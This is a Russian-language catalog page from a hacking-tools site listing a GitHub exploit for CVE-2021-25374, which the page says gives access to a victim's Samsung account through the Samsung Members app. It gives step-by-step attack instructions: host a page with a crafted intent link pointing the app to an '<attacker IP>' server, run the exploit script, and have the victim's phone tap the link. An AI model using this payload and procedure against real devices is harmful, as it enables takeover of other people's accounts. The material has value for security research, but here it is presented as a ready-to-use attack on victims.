Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-25374_Samsung-Account-Access — Этот скрипт может быть использован для получения доступа к аккаунту Samsung жертвы, если на её устройстве Samsung установлена определённая версия приложения Samsung Members, и если устройство жертвы относится к региону США или Кореи. | Kitploit
Инструменты/GitHubGitHub/reverseclabs/cve-2021-25374_samsung-account-access
Безопасность AndroidИнструменты фишингаЭксплуатацияЭксплуатация веб-приложенийМобильная безопасностьСоциальная инженерия
GitHubreverseclabs/cve-2021-25374_samsung-account-access

CVE-2021-25374_Samsung-Account-Access

Этот скрипт может быть использован для получения доступа к аккаунту Samsung жертвы, если на её устройстве Samsung установлена определённая версия приложения Samsung Members, и если устройство жертвы относится к региону США или Кореи.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
321962 лет назадПроверено Kitploit

CVE-2021-25374 - Скрипт для доступа к аккаунту Samsung

Этот скрипт может быть использован для получения доступа к аккаунту Samsung жертвы, если на её устройстве Samsung установлена определённая версия приложения Samsung Members, и если устройство жертвы из региона США или Кореи.

Как использовать этот скрипт:

  1. Запустите веб-сервер, который будет хостить веб-страницу со следующей ссылкой:

<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>

ПРИМЕЧАНИЕ: замените "<attacker IP>" на IP-адрес, с которого вы будете запускать этот скрипт.

  1. Запустите этот скрипт

python3 ./samsung_account_access.py

  1. С помощью телефона Samsung перейдите на веб-сервер и нажмите на ссылку

  2. Позвольте скрипту сделать своё дело

Дополнительная информация об уязвимости, которую эксплуатирует этот скрипт, доступна здесь:

Скачать инструмент